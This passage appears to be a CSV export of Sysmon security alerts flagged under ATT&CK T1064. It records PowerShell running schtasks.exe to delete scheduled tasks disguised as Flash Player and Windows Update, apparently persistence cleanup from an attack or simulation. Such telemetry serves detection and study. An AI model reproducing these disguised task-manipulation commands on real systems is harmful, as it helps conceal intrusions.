Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 
14:19:01.572",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.587 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-00109dae2100} +ProcessId: 4752 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.590739300Z"",""eventRecordID"":""2807"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.587\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-00109dae2100}\r\nProcessId: 4752\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 
(WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.587"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-00109dae2100}"",""processId"":""4752"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.557",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.555 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-0010dfab2100} +ProcessId: 4436 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer2 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.558394700Z"",""eventRecordID"":""2806"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.555\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-0010dfab2100}\r\nProcessId: 4436\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.555"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-0010dfab2100}"",""processId"":""4436"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.541",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.521 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-001058a92100} +ProcessId: 1768 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.523962900Z"",""eventRecordID"":""2805"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.521\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-001058a92100}\r\nProcessId: 1768\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:31.521"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-001058a92100}"",""processId"":""1768"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.510",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.483 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-001000a72100} +ProcessId: 3540 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN AdobeFlashPlayer /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 
+IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN AdobeFlashPlayer /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.486212600Z"",""eventRecordID"":""2804"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.483\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-001000a72100}\r\nProcessId: 3540\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN AdobeFlashPlayer /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: 
{df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.483"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-001000a72100}"",""processId"":""3540"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN AdobeFlashPlayer /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.494",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.452 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-001039a52100} +ProcessId: 6724 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: 
Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.456020400Z"",""eventRecordID"":""2803"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.452\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-001039a52100}\r\nProcessId: 6724\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: 
{df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.452"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-001039a52100}"",""processId"":""6724"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.478",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 
2020-05-28 12:50:31.414 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-00103da32100} +ProcessId: 3664 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.418269500Z"",""eventRecordID"":""2802"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.414\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-00103da32100}\r\nProcessId: 3664\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: 
Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.414"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-00103da32100}"",""processId"":""3664"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
